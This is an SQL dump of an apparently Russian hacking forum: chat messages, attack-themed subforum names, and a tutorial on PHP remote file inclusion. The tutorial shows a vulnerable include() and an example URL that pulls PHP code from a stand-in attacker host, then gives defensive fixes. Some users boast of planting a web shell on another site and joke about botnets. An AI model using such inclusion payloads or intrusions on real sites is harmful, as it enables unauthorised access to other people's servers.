INSERT INTO f_message VALUES("71","1","[b] bypass[/b], буду сам себя поддерживать.и писать обновы.на чем стоит винда(язык)?","39","0","0","","97","1426436988","0","0","0","0");
INSERT INTO f_message VALUES("73","4","Ребята, вверх! :)","1","0","0","","102","1426437074","0","0","0","0");
INSERT INTO f_message VALUES("89","5","<div class=\"quote\">Elitawap: [b] IronnHeart[/b], а как монеты зарабатывать?А там есть типо история ников?</div>Прошу прощения, я еще не совсем функционалом сайта разобрался, напишите на ник Senusert, думаю он решит вашу проблему, приятного вам общения","21","0","0","","97","1426437874","0","0","0","0");
INSERT INTO f_message VALUES("75","4","Уже работает, 1р на балансе))","32","0","0","","102","1426437133","0","0","0","0");
INSERT INTO f_message VALUES("76","4","))) До делал уже)","30","0","0","","102","1426437185","0","0","0","0");
INSERT INTO f_message VALUES("78","5","[b] IronnHeart[/b], а как монеты зарабатывать?А там есть типо история ников?","39","0","0","","97","1426437243","0","0","0","0");
INSERT INTO f_message VALUES("87","5","Антон, 16 лет. Системный админ Гг","36","0","0","","97","1426437825","0","0","0","0");
INSERT INTO f_message VALUES("81","1","[b] Elitawap[/b], DOS язык Гг Семейство NT для заметки ;)","36","36","0","","97","1426437280","0","0","0","0");
INSERT INTO f_message VALUES("86","5","Ку)) Алексей","7","0","0","","97","1426437737","0","0","0","0");
INSERT INTO f_message VALUES("88","5","[b] Elitawap[/b], монеты начисляются за общение на форуме :) Позже их можно будет выводить на реальные деньги :)","1","0","0","","97","1426437868","0","0","0","0");
INSERT INTO f_message VALUES("91","5","[b] Senusert[/b], там есть типо истории ников?","39","0","0","","97","1426438001","0","0","0","0");
INSERT INTO f_message VALUES("93","1","[b] bypass[/b], и нашо оно тебе нада?порно*кайф*","39","0","0","","97","1426438135","0","0","0","0");
INSERT INTO f_message VALUES("94","1","[q]Elitawap: [b] bypass[/b], и нашо оно тебе нада?порно*кайф*[/q]<br /><br />Я прост проверил, а так вдска не подвела *кайф*","36","36","0","","97","1426438304","0","0","0","0");
INSERT INTO f_message VALUES("95","1","[b] bypass[/b], а то я подумал :D","39","0","0","","97","1426438551","0","0","0","0");
INSERT INTO f_message VALUES("96","4",":)","7","0","0","","102","1426438758","0","0","0","0");
INSERT INTO f_message VALUES("97","4","1р на балансе :)","39","0","0","","102","1426439085","0","0","0","0");
INSERT INTO f_message VALUES("98","4","Рублик капнул, норм.","36","0","0","","102","1426439105","0","0","0","0");
INSERT INTO f_message VALUES("99","4","Ну да)) Но я имею ввиду пока выводы производится не будут, вот завтра, послезавтра думаю начать выводить :)","1","0","0","","102","1426439230","0","0","0","0");
INSERT INTO f_message VALUES("100","8","Полезная статья :)","1","0","0","","71","1426439421","0","0","0","0");
INSERT INTO f_message VALUES("105","10","Это же хак-форум *дану*","39","0","0","","97","1426441480","0","0","0","0");
INSERT INTO f_message VALUES("103","3","[отв][цит] зделать вместе.","39","0","0","","103","1426439924","0","0","0","0");
INSERT INTO f_message VALUES("104","4","10постов = 1р?","39","0","0","","102","1426441285","0","0","0","0");
INSERT INTO f_message VALUES("106","10","[q]Elitawap: Это же хак-форум *дану*[/q]Ну прикинь какие действия можно делать. К примеру Ботнет поставить либо Форекс врезать.<br />Крч главное не спалится","36","36","0","","97","1426441551","0","0","0","0");
INSERT INTO f_message VALUES("107","10","[b] bypass[/b], да главное не спалится.","39","0","0","","97","1426442309","0","0","0","0");
INSERT INTO f_message VALUES("108","10","<div class=\"quote\">nab1r: [b] bypass[/b], да главное не спалится.</div>Крч, выброшу","36","0","0","","97","1426442424","0","0","0","0");
INSERT INTO f_message VALUES("109","10","[b] bypass[/b], окай","39","0","0","","97","1426442482","0","0","0","0");
INSERT INTO f_message VALUES("110","10","пиши конечно :)","1","0","0","","97","1426442671","0","0","0","0");
INSERT INTO f_message VALUES("111","11","Кинь ссылку на сам скрипт :)","1","0","0","","97","1426442845","0","0","0","0");
INSERT INTO f_message VALUES("112","11","[b] Senusert[/b], вот сайт up-keo.ru","18","0","0","","97","1426442893","0","0","0","0");
INSERT INTO f_message VALUES("113","10","[b] Senusert[/b], ну ща тогда подготовлю","36","0","0","","97","1426442998","0","0","0","0");
INSERT INTO f_message VALUES("114","10","[b] bypass[/b], давай Гг","1","0","0","","97","1426443240","0","0","0","0");
INSERT INTO f_message VALUES("115","11","дай ссылку на скачку, посмотреть же нужно, что бы помочь :)","1","0","0","","97","1426443321","0","0","0","0");
INSERT INTO f_message VALUES("116","11","[b] test[/b], на бумасе твой ник butter?","27","0","0","","97","1426443481","0","0","0","0");
INSERT INTO f_message VALUES("117","10","[b] Senusert[/b], готово. Буду по частям выпускать.","36","0","0","","97","1426444535","0","0","0","0");
INSERT INTO f_message VALUES("118","11","[b] vinkh[/b], ага","18","0","0","","97","1426444550","0","0","0","0");
INSERT INTO f_message VALUES("119","10","[b] bypass[/b], ok :)","1","0","0","","97","1426444590","0","0","0","0");
INSERT INTO f_message VALUES("120","11","[b] test[/b], так ты там с вип знаком!","27","0","0","","97","1426444622","0","0","0","0");
INSERT INTO f_message VALUES("135","11","[b] Senusert[/b], етот скрипт и с мобилы поставить можна он простой скрипт","18","0","0","","97","1426445650","0","0","0","0");
INSERT INTO f_message VALUES("122","11","[b] vinkh[/b], всмысле","18","0","0","","97","1426444681","0","0","0","0");
INSERT INTO f_message VALUES("123","11","[b] test[/b], на доске пазора!","27","0","0","","97","1426444789","0","0","0","0");
INSERT INTO f_message VALUES("124","11","ау","18","0","0","","97","1426444799","0","0","0","0");
INSERT INTO f_message VALUES("125","11","…попал туда через <span style=\"color: #FF0000;\"><b>[censored]</b></span>ка одного","18","0","0","","97","1426444877","0","0","0","0");
INSERT INTO f_message VALUES("126","11","в дирректории system/db.php прописываешь базуЗаливаешь таблицыРегаешь админа, вроде остальное всё в админке","1","0","0","","97","1426444890","0","0","0","0");
INSERT INTO f_message VALUES("127","11","<div class=\"quote\">test: …попал туда через <span style=\"color: #FF0000;\"><b>[censored]</b></span>ка одного</div>ясно","27","0","0","","97","1426444950","0","0","0","0");
INSERT INTO f_message VALUES("128","11","[b] Senusert[/b], там админа регать нельзя,вот што выбывает:Сбой: Временные трудности! как ето убрать?","18","0","0","","97","1426445047","0","0","0","0");
INSERT INTO f_message VALUES("129","11","ау","18","0","0","","97","1426445249","0","0","0","0");
INSERT INTO f_message VALUES("130","11","[b] test[/b], тише","27","0","0","","97","1426445372","0","0","0","0");
INSERT INTO f_message VALUES("131","11","ну так помогите","18","0","0","","97","1426445465","0","0","0","0");
INSERT INTO f_message VALUES("132","11","[b] test[/b], я хз, не ставил, просто взглянул, что бы решить, нужно ставить движок, а я с тела","1","0","0","","97","1426445524","0","0","0","0");
INSERT INTO f_message VALUES("133","2","http://hackbite.ru/","18","27","0","","102","1426445544","0","0","0","0");
INSERT INTO f_message VALUES("134","11","<div class=\"quote\">test: ну так помогите</div>тему видно поэтаму ау часто ненадо!","27","0","0","","97","1426445578","0","0","0","0");
INSERT INTO f_message VALUES("136","11","[b] test[/b], а ты ее полностью настроил? Ввел хеш?","36","0","0","","97","1426445654","0","0","0","0");
INSERT INTO f_message VALUES("137","11","<div class=\"quote\">test: [b] Senusert[/b], етот скрипт и с мобилы поставить можна он простой скрипт</div>У меня хостинг worldbyte, а не кео","1","0","0","","97","1426445784","0","0","0","0");
INSERT INTO f_message VALUES("138","11","[b] bypass[/b], где прописовать ево","18","0","0","","97","1426446005","0","0","0","0");
INSERT INTO f_message VALUES("139","11","[b] Senusert[/b], блин","18","0","0","","97","1426446132","0","0","0","0");
INSERT INTO f_message VALUES("140","11","<div class=\"quote\">bypass: [b] test[/b], а ты ее полностью настроил? Ввел хеш?</div>…сеть ибо он <span style=\"color: #FF0000;\"><b>[censored]</b></span>вшек чмо","41","0","0","","97","1426454814","0","0","0","0");
INSERT INTO f_message VALUES("141","2","Я могу...","41","0","0","","102","1426454969","0","0","0","0");
INSERT INTO f_message VALUES("142","4","Норм","41","0","0","","102","1426455027","0","0","0","0");
INSERT INTO f_message VALUES("143","1","Ща ломать свой комп будем через уязвимости","41","0","0","","97","1426455242","0","0","0","0");
INSERT INTO f_message VALUES("144","5","Александр, 14 лет","41","0","0","","97","1426455259","0","0","0","0");
INSERT INTO f_message VALUES("145","5","[b] TheAlex[/b], Привет Добро)","30","0","0","","97","1426456782","0","0","0","0");
INSERT INTO f_message VALUES("146","3","Диз кончалыжный Гг","44","0","0","","103","1426482358","0","0","0","0");
INSERT INTO f_message VALUES("147","3","[b] DarkMs[/b], о привет :) Знаю, скоро новый будет :)","1","0","0","","103","1426482559","0","0","0","0");
INSERT INTO f_message VALUES("148","5","Максим, 19 лет, Украина, г.Южноукраинск","51","0","0","","97","1426486345","0","0","0","0");
INSERT INTO f_message VALUES("149","2","Думаю меня знают :) Мака, 19 л. Украина. Русский +5","51","0","0","","102","1426486902","0","0","0","0");
INSERT INTO f_message VALUES("150","2","<div class=\"quote\">Groznyy: Думаю меня знают :) Мака, 19 л. Украина. Русский +5</div>лично я незнаю!","27","0","0","","102","1426488821","0","0","0","0");
INSERT INTO f_message VALUES("151","2","<div class=\"quote\">vinkh: лично я незнаю!</div>Анкету мою глянь","51","0","0","","102","1426489076","0","0","0","0");
INSERT INTO f_message VALUES("152","12","VKlike","51","0","0","","97","1426489219","0","0","0","0");
INSERT INTO f_message VALUES("153","2","<div class=\"quote\">Groznyy: Анкету мою глянь</div>видел поэтаму и говарю незнаю","27","0","0","","102","1426489261","0","0","0","0");
INSERT INTO f_message VALUES("154","12","[q]Groznyy: VKlike[/q]а где ее скачать можно?","27","27","0","","97","1426489329","0","0","0","0");
INSERT INTO f_message VALUES("155","11","<div class=\"quote\">TheAlex: …сеть ибо он <span style=\"color: #FF0000;\"><b>[censored]</b></span>вшек чмо</div>Без оскорблений!","27","0","0","","97","1426489464","0","0","0","0");
INSERT INTO f_message VALUES("156","5","Здарова пацаны!","57","0","0","","97","1426489590","0","0","0","0");
INSERT INTO f_message VALUES("157","5","[b] Ambalik[/b], здрасти","27","0","0","","97","1426489721","0","0","0","0");
INSERT INTO f_message VALUES("158","12","[b] Groznyy[/b], а ну теперь узнал тебя!","27","0","0","","97","1426489940","0","0","0","0");
INSERT INTO f_message VALUES("159","12","Помоему VKLIKE в play markete есть :)","1","0","0","","97","1426490145","0","0","0","0");
INSERT INTO f_message VALUES("160","12","[b] Senusert[/b], он лайки крутет а мне надо в группу чел","27","27","0","","97","1426490339","0","0","0","0");
INSERT INTO f_message VALUES("164","12","<div class=\"quote\">vinkh: [b] Senusert[/b], качнул ее непроходит авторизацию</div>ну эт хз уже :)","1","0","0","","97","1426490795","0","0","0","0");
INSERT INTO f_message VALUES("162","12","[b] vinkh[/b], там помоему не обязательно лайки крутить только","1","0","0","","97","1426490515","0","0","0","0");
INSERT INTO f_message VALUES("163","12","[b] Senusert[/b], качнул ее непроходит авторизацию","27","0","0","","97","1426490649","0","0","0","0");
INSERT INTO f_message VALUES("165","12","likest.ru - С моб вполне можно крутить, пусть и не приложение","21","0","0","","97","1426491097","0","0","0","0");
INSERT INTO f_message VALUES("166","12","<div class=\"quote\">IronnHeart: likest.ru - С моб вполне можно крутить, пусть и не приложение</div>незнаеш где холявные купоны взять для него?","27","0","0","","97","1426491711","0","0","0","0");
INSERT INTO f_message VALUES("167","12","[b] vinkh[/b], с бесплатных раздач, хотя как по мне легче купить с рук","21","0","0","","97","1426491993","0","0","0","0");
INSERT INTO f_message VALUES("168","12","<div class=\"quote\">vinkh: незнаеш где холявные купоны взять для него?</div>FACEPALM","51","0","0","","97","1426492029","0","0","0","0");
INSERT INTO f_message VALUES("169","12","[b] Groznyy[/b], это чего такое?","27","0","0","","97","1426492242","0","0","0","0");
INSERT INTO f_message VALUES("170","14","Ну у меня уже три домена, оплата 299 руб","36","0","0","","78","1426493255","0","0","0","0");
INSERT INTO f_message VALUES("171","14","[b] bypass[/b], и всё же, будет у тебя 20 доменов, всё равно по 149 р продление, это пздц много","1","0","0","","78","1426493467","0","0","0","0");
INSERT INTO f_message VALUES("172","14","[b] Senusert[/b], придется воровать домены Гг","36","0","0","","78","1426493886","0","0","0","0");
INSERT INTO f_message VALUES("173","14","))) мир сошел с ума!!! ","30","0","0","","78","1426496937","0","0","0","0");
INSERT INTO f_message VALUES("174","14","Не проще где-до в другом месте покупать домены, где дешевле, ммм? Где логика?","51","0","0","","78","1426497441","0","0","0","0");
INSERT INTO f_message VALUES("175","14","Ну понятно, что партнёры и всё такое, но всё же.... Говорю как думаю","51","0","0","","78","1426497498","0","0","0","0");
INSERT INTO f_message VALUES("176","5","[b] Groznyy[/b], привет Макс)","30","0","0","","97","1426499611","0","0","0","0");
INSERT INTO f_message VALUES("177","5","<div class=\"quote\">ICE: [b] Groznyy[/b], привет Макс)</div>Ку :)","51","0","0","","97","1426501141","0","0","0","0");
INSERT INTO f_message VALUES("178","12","[b] Senusert[/b], это незаконно *дану2*","39","0","0","","97","1426502254","0","0","0","0");
INSERT INTO f_message VALUES("179","12","<div class=\"quote\">nab1r: [b] Senusert[/b], это незаконно *дану2*</div>не оффтопь","27","0","0","","97","1426511508","0","0","0","0");
INSERT INTO f_message VALUES("180","5","<div class=\"quote\">ICE: [b] TheAlex[/b], Привет Добро)</div>Добро ? xd","41","0","0","","97","1426520320","0","0","0","0");
INSERT INTO f_message VALUES("181","5","<div class=\"quote\">TheAlex: Добро ? xd</div>Пожаловать","30","0","0","","97","1426520879","0","0","0","0");
INSERT INTO f_message VALUES("182","18","Данный проект не предоставляется такие услуги.","30","0","0","","96","1426571204","0","0","0","0");
INSERT INTO f_message VALUES("183","18","[b] ICE[/b], всмисле","49","0","0","","96","1426571938","0","0","0","0");
INSERT INTO f_message VALUES("184","18","<div class=\"quote\">lomer: [b] ICE[/b], всмисле</div>говорю будет помощь","30","0","0","","96","1426572319","0","0","0","0");
INSERT INTO f_message VALUES("185","17","Сегодня вечером поищу","1","0","0","","71","1426575021","0","0","0","0");
INSERT INTO f_message VALUES("186","17","нашол! и дырочек парочку! сейчас на админе сижу!","27","0","0","","71","1426601548","0","0","0","0");
INSERT INTO f_message VALUES("187","17","[b] vinkh[/b], шелл залил?","39","0","0","","71","1426612983","0","0","0","0");
INSERT INTO f_message VALUES("188","17","<div class=\"quote\">nab1r: [b] vinkh[/b], шелл залил?</div>А ты этого ждешь","36","0","0","","71","1426615908","0","0","0","0");
INSERT INTO f_message VALUES("189","17","<div class=\"quote\">nab1r: [b] vinkh[/b], шелл залил?</div>ну типо таво!","27","0","0","","71","1426616642","0","0","0","0");
INSERT INTO f_message VALUES("190","5","сергей 25","65","0","0","","97","1426757570","0","0","0","0");
INSERT INTO f_message VALUES("191","17","[b] vinkh[/b], деньги вывел?","39","0","0","","71","1426800004","0","0","0","0");
INSERT INTO f_message VALUES("192","17","[b] nab1r[/b], нет я ничего нетрогал! я увожаю чужой труд! но мой шел там так и стоит!","27","27","0","","71","1426841792","0","0","0","0");
INSERT INTO f_message VALUES("195","20","видел,на бумасе *збс*","39","39","0","","77","1426898555","0","0","0","0");
INSERT INTO f_message VALUES("200","20",")))) Прикол.","30","0","0","","77","1426913552","0","0","0","0");
INSERT INTO f_message VALUES("201","14","Если не можете позволить себе продление за такие деньги, то переносите домены к партнерам. По моему это лучши1 варик","6","0","0","","78","1426914725","0","0","0","0");
INSERT INTO f_message VALUES("202","21","вап способы для управления услугами есть?","30","0","0","","78","1426916235","0","0","0","0");
INSERT INTO f_message VALUES("206","21","[b] ICE[/b], wap версия в разработке!","6","0","0","","78","1426921366","0","0","0","0");
INSERT INTO f_message VALUES("209","22","Насчёт поиска шелов, есть специальные программы, способные находить такие скрипты. У меня есть парочка, если что могу предоставить. Насчёт использования шелов, то всё очень просто. Нужно всего лишь найти подобный скрипт и перейти по адресу его нахождения (типо http://test.ru/shell.php )","1","0","0","","71","1426931295","0","0","0","0");
INSERT INTO f_message VALUES("210","20","не фурычит вроде","1","0","0","","77","1426931334","0","0","0","0");
INSERT INTO f_message VALUES("211","22","<div class=\"quote\">Senusert: Насчёт поиска шелов, есть специальные программы, способные находить такие скрипты. У меня есть парочка, если что могу предоставить. Насчёт использования шелов, то всё очень просто. Нужно всего лишь на...</div>а какие проги для этого есть?","72","0","0","","71","1426932166","0","0","0","0");
INSERT INTO f_message VALUES("212","20","АХАХАХАХАХ","76","0","0","","77","1426933126","0","0","0","0");
INSERT INTO f_message VALUES("213","20","<div class=\"quote\">qwerty: АХАХАХАХАХ</div>???","1","0","0","","77","1426933336","0","0","0","0");
INSERT INTO f_message VALUES("214","20","[b] Senusert[/b], Когда зашел на проект то смеялся долго","76","0","0","","77","1426933482","0","0","0","0");
INSERT INTO f_message VALUES("215","20","[b] Senusert[/b], особенно Здорова Усем !!!Ну вы надеюсь поняли что это нае*алово) И все это сделано чтобы пропиарить мой ТОР рейтинг сайтов )))toper.gaА если серьезно то я делал этот сайт не зная PHP !!! так что не бомбите в мою сторону ,прост делать нех решил что то сделать ... Удачи вам ХАКЕРЫыыы...!!!!! APOFIaS RULIT !!!!!","76","0","0","","77","1426933539","0","0","0","0");
INSERT INTO f_message VALUES("216","20","<div class=\"quote\">qwerty: [b] Senusert[/b], Когда зашел на проект то смеялся долго</div>ты про какой проект?","1","0","0","","77","1426933736","0","0","0","0");
INSERT INTO f_message VALUES("217","20","[b] Senusert[/b], http://servak.ga/","76","0","0","","77","1426936296","0","0","0","0");
INSERT INTO f_message VALUES("218","20","Старался :D","29","0","0","","77","1426937217","0","0","0","0");
INSERT INTO f_message VALUES("219","20","Есть у кого идеи по дальнейшему развитию ?А то мне делать неКуй)","29","0","0","","77","1426937414","0","0","0","0");
INSERT INTO f_message VALUES("220","20","[b] Apofias[/b], да написать реальный взломщик :D","76","0","0","","77","1426937997","0","0","0","0");
INSERT INTO f_message VALUES("221","20","гавно полнейшеехоть бы поправил ошибки для приличия","65","0","0","","77","1426939200","0","0","0","0");
INSERT INTO f_message VALUES("222","20","<div class=\"quote\">qwerty: [b] Apofias[/b], да написать реальный взломщик :D</div>реальный это для слабаков)","29","0","0","","77","1426939514","0","0","0","0");
INSERT INTO f_message VALUES("223","20","<div class=\"quote\">малыш: гавно полнейшеехоть бы поправил ошибки для приличия</div>Ну ка ...даФай Ашибки","29","0","0","","77","1426939551","0","0","0","0");
INSERT INTO f_message VALUES("266","29","тест 2","94","0","hackbit.net_442457.jpg","","101","1438148607","0","0","0","0");
INSERT INTO f_message VALUES("265","29","тест","94","0","hackbit.net_7640043.jpg","","101","1438148364","0","0","0","0");
INSERT INTO f_message VALUES("264","28","<div class=\"quote\">xbit: Только восклицательный знак убери..</div>Спс","160","0","0","","75","1438066984","0","0","0","0");
INSERT INTO f_message VALUES("263","28","Только восклицательный знак убери..","94","0","0","","75","1438021678","0","1","0","0");
INSERT INTO f_message VALUES("234","23","на сколько я знаю да…","30","0","0","","96","1427114094","0","0","0","0");
INSERT INTO f_message VALUES("235","20","Обновил главную ...)","29","0","0","","77","1427152394","0","0","0","0");
INSERT INTO f_message VALUES("236","23","[b] ICE[/b], не то что есть я хнаю а вот найти... непросто...","19","0","0","","96","1427189104","0","0","0","0");
INSERT INTO f_message VALUES("237","23","<div class=\"quote\">XaPzZ: [b] ICE[/b], не то что есть я хнаю а вот найти... непросто...</div>да там вес код обшарить надо","30","0","0","","96","1427203677","0","0","0","0");
INSERT INTO f_message VALUES("238","23","[b] ICE[/b], нуда...","19","0","0","","96","1427210963","0","0","0","0");
INSERT INTO f_message VALUES("262","28","http://hack!zone.ru/forum/open/id/15479/","94","0","0","","75","1438021652","0","0","0","0");
INSERT INTO f_message VALUES("241","23","полно","39","0","0","","96","1427374007","0","0","0","0");
INSERT INTO f_message VALUES("258","26","Lari?I remember you.My name is Nikolai.What is your name?","120","0","0","","97","1437762785","0","0","0","0");
INSERT INTO f_message VALUES("245","23","[b] nab1r[/b], пример?","19","0","0","","96","1427545111","0","0","0","0");
INSERT INTO f_message VALUES("249","20","Тест убил :D","7","0","0","","77","1428009929","0","0","0","0");
INSERT INTO f_message VALUES("259","27","Что за игра?Подробней!","120","0","0","","96","1437817773","0","0","0","0");
INSERT INTO f_message VALUES("260","27","<div class=\"quote\">Frank_Sorkut: Что за игра?Подробней!</div><span style=\"color: #FF0000;\"><b>[censored]</b></span>oeswm ruвзлом персонажей любым…","155","0","0","","96","1437820245","0","0","0","0");
DROP TABLE IF EXISTS `f_pod`;
CREATE TABLE `f_pod` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`pid` int(11) NOT NULL DEFAULT '0',
`name` char(50) NOT NULL DEFAULT '',
`time` int(11) NOT NULL DEFAULT '0',
PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=125 DEFAULT CHARSET=utf8;
INSERT INTO f_pod VALUES("75","31","Фейки / Снифферы / Фишинг","1373110394");
INSERT INTO f_pod VALUES("82","34","Русские","1373111778");
INSERT INTO f_pod VALUES("68","31","Cross Site Scripting (XSS)","1373109788");
INSERT INTO f_pod VALUES("69","31","SQL Injection","1373109816");
INSERT INTO f_pod VALUES("70","31","DDoS (HTTP,UDP,TCP)","1373109854");
INSERT INTO f_pod VALUES("71","31","PHP Injection (shell)","1373109934");
INSERT INTO f_pod VALUES("72","31","PHP Include","1373109951");
INSERT INTO f_pod VALUES("73","31","Сross Site Request Forgery (CSRF)","1373110079");
INSERT INTO f_pod VALUES("76","35","PHP,MySQL,,JavaScript,VBS,Delphi,C#++,VB","1373111346");
INSERT INTO f_pod VALUES("77","36","WAP","1373111662");
INSERT INTO f_pod VALUES("78","36","WEB","1373111676");
INSERT INTO f_pod VALUES("79","34","Украинские","1373111722");
INSERT INTO f_pod VALUES("83","34","Другие","1373111811");
INSERT INTO f_pod VALUES("74","31","Вирусы / Алармы","1373110368");
INSERT INTO f_pod VALUES("84","33","Windows (XP,Vista,7,8)","1373111848");
INSERT INTO f_pod VALUES("85","33","Linux","1373111917");
INSERT INTO f_pod VALUES("86","33","Java (J2ME)","1373111939");
INSERT INTO f_pod VALUES("87","33","Android","1373111958");
INSERT INTO f_pod VALUES("88","33","Bada","1373111993");
INSERT INTO f_pod VALUES("89","32","Компютеры (Desktop)","1373112115");
INSERT INTO f_pod VALUES("90","32","Ноутбуки / Нетбуки","1373112155");
INSERT INTO f_pod VALUES("91","32","Телефоны / Смартфоны / КПК","1373112188");
INSERT INTO f_pod VALUES("92","32","Планшеты","1373112223");
INSERT INTO f_pod VALUES("96","31","Взлом (общее)","1373112541");
INSERT INTO f_pod VALUES("94","31","Брутфорсеры / Словари / Спамеры","1373112368");
INSERT INTO f_pod VALUES("97","37","Общение,троллинг :)","1373112748");
INSERT INTO f_pod VALUES("98","31","Вопросы новичков","1373113212");
INSERT INTO f_pod VALUES("99","32","Сервера","1373114001");
INSERT INTO f_pod VALUES("105","39","Обучение/Помощь новичкам","1390799407");
INSERT INTO f_pod VALUES("101","38","Тех.работы/Баги/Ошибки","1375947002");
INSERT INTO f_pod VALUES("102","38","Новости разработки/Обновления","1375947043");
INSERT INTO f_pod VALUES("103","38","Предложения по сайту","1375947077");
INSERT INTO f_pod VALUES("104","35","Купля/продажа/услуги/ищу","1384159682");
INSERT INTO f_pod VALUES("107","39","Раскрутка/SEO__ООП","1390799490");
INSERT INTO f_pod VALUES("108","39","Хостинги/Домены","1390799522");
INSERT INTO f_pod VALUES("109","39","Графика/Дизайн","1390799539");
INSERT INTO f_pod VALUES("110","39","Помощь по скриптам","1390799561");
INSERT INTO f_pod VALUES("111","39","Поиск скриптов","1390799586");
INSERT INTO f_pod VALUES("114","39","Кредит/Займ","1390799719");
INSERT INTO f_pod VALUES("113","39","Услуги/Фриланс","1390799668");
INSERT INTO f_pod VALUES("115","39","Заработок","1390799745");
INSERT INTO f_pod VALUES("116","39","(x)HTML/WML/CSS","1390799800");
INSERT INTO f_pod VALUES("117","39","PHP/MySQL","1390799820");
INSERT INTO f_pod VALUES("118","39","JavaScript","1390799860");
INSERT INTO f_pod VALUES("119","39","Smarty","1390799897");
INSERT INTO f_pod VALUES("120","39","Другие языки","1390799909");
INSERT INTO f_pod VALUES("121","39","Оценка сайтов","1390799929");
INSERT INTO f_pod VALUES("122","39","Полезные сайты","1390799950");
INSERT INTO f_pod VALUES("123","39","Корзина","1390799976");
INSERT INTO f_pod VALUES("124","33","Symbian","1390800090");
DROP TABLE IF EXISTS `f_razdel`;
CREATE TABLE `f_razdel` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`name` char(50) NOT NULL DEFAULT '',
`ico` char(6) NOT NULL,
`opis` char(50) NOT NULL DEFAULT '0',
PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=40 DEFAULT CHARSET=utf8;
INSERT INTO f_razdel VALUES("38","Hackbit","","Жизнь сайта");
INSERT INTO f_razdel VALUES("37","Свободное общение","","Общение на разные темы");
INSERT INTO f_razdel VALUES("36","Интернет ресурсы / Сайты / Сервисы (WAP,WEB)","","Обсуждение разных интернет ресурсов");
INSERT INTO f_razdel VALUES("35","Программирование и разметка","","Все о разных языках программирования");
INSERT INTO f_razdel VALUES("34","Мобильная связь / Операторы","","Все об операторах мобильной связи");
INSERT INTO f_razdel VALUES("33","Операционные системы","","Все об операционных системах");
INSERT INTO f_razdel VALUES("32","Компютеры / Смартфоны","","Все о компютерных и мобильных технологиях");
INSERT INTO f_razdel VALUES("31","Хакинг / Взлом / Защита","","Уязвимости,баги,ошибки");
INSERT INTO f_razdel VALUES("39","Раздел - Wap мастеру","","Раздел посвящен мастерам wap и web");
DROP TABLE IF EXISTS `f_them`;
CREATE TABLE `f_them` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`rid` int(11) NOT NULL DEFAULT '0',
`name` char(255) NOT NULL DEFAULT '',
`author` int(11) NOT NULL DEFAULT '0',
`close` smallint(2) NOT NULL DEFAULT '0',
`whoedit` int(11) NOT NULL DEFAULT '0',
`date` int(11) NOT NULL DEFAULT '0',
`firstpost` text NOT NULL,
`fix` smallint(2) NOT NULL DEFAULT '0',
`razdel_id` int(11) NOT NULL DEFAULT '0',
`last` int(11) NOT NULL DEFAULT '0',
`quest` char(255) NOT NULL,
`var1` char(20) NOT NULL,
`var2` char(20) NOT NULL,
`var3` char(20) NOT NULL,
`var4` char(20) NOT NULL,
PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=30 DEFAULT CHARSET=utf8;
INSERT INTO f_them VALUES("1","97","Windows 8 - баги и уязвимости","1","0","0","1420215860","В эту тему пишем все баги и уязвимости OS Windows 8","1","37","1426455242","","","","","");
INSERT INTO f_them VALUES("2","102","Набор администрации","1","0","0","1420216604","Ведётся набор администрации на сайт<br />Нужны 2 администратора и 2 модератора<br />Заявки оставляйте ниже в теме","0","38","1426489261","","","","","");
INSERT INTO f_them VALUES("3","103","Предложения по развитию проекта","1","0","0","1420216697","В этой теме вы можете оставить свои пожелания, о том, что вы хотели бы увидеть на сайте. По возможности мы это добавим","0","38","1426482559","","","","","");
INSERT INTO f_them VALUES("4","102","Оплата за посты","1","0","0","1426432016","Уважаемые пользователи! Сейчас доделываю систему оплаты за посты! :) Общаяясь у нас на форуме вы сможете подзаработать :) Ждите, скоро обновление будет готово! :)","0","38","1426455027","","","","","");
INSERT INTO f_them VALUES("5","97","Знакомимся )","1","0","0","1426433564","Ребят, давайте знакомиться, кого как звать? :)<br />Меня Денис, 24 года :)","0","37","1426757570","","","","","");
INSERT INTO f_them VALUES("7","91","Прошивка и Разблокировка Смартфонов","30","0","30","1426436768","Привет всем, в этой теме каждую неделю буду выкладывать статьи про Разлочку и Прошивки смартов. <br /> И по просьбе юзеров сайта отдельно; )<br />","1","32","1426436768","","","","","");
INSERT INTO f_them VALUES("8","71","PHP-инъекция","7","0","0","1426439154","Здесь немного расскажу о PHP-инъекция<br /><br />Пример:<br /><?<br />...<br />$module = $_GET['module'];<br />include ($module.'.php');<br />...<br />?><br /><br />Этот скрипт уязвим, так как к содержимому переменной $module<br />просто прибавляется «.php» и по<br />полученному пути подключается файл.<br />Взломщик может на своём сайте создать<br />файл, содержащий PHP-код ( http://<br />Site.ru/inc.php ), и зайдя на<br />сайт по ссылке вроде http://<br />mysite.com/index.php?module=http://<br />Site.ru/inc выполнить любые<br />PHP-команды.<br /><br /><<<<<<< Способы защиты >>>>>>><br />Существует несколько способов защиты от<br />такой атаки:<br />Проверять, не содержит ли переменная<br />$module посторонние символы:<br /><br /><?<br />...<br />$module = $_GET['module'];<br />if (strpbrk($module,<br />'.?/:')) die('Blocked');<br />include $module. '.php';<br />...<br />?><br /><br />Проверять, что $module присвоено<br />одно из допустимых значений:<br /><br /><?<br />...<br />$module = $_GET['module'];<br />$arr = array('main',<br />'about', 'links', 'forum');<br />if (!in_array($module,$arr))<br />$module = $arr[0];<br />include $module . '.php';<br />...<br />?><br /><br />Этот способ является более эффективным,<br />красивым и аккуратным.<br />Прописать каждое значение через if<br /><br /><?<br />...<br />$module = $_GET['module'];<br />if ($module == 'main')<br />include 'main.php';<br />if ($module == 'about')<br />include 'about.php';<br />if ($module == 'links')<br />include 'links.php';<br />if ($module == 'forum')<br />include 'forum.php';<br />...<br />?><br /><br />PHP предоставляет также возможность<br />отключения использования удаленных<br />файлов, это реализуется путем изменения<br />значения опции allow_url_fopen на<br />Off в файле конфигурации сервера<br />php.ini .<br />Описанная уязвимость представляет<br />высокую опасность для сайта и авторам<br />PHP-скриптов не надо забывать про неё.","0","31","1426439421","","","","","");
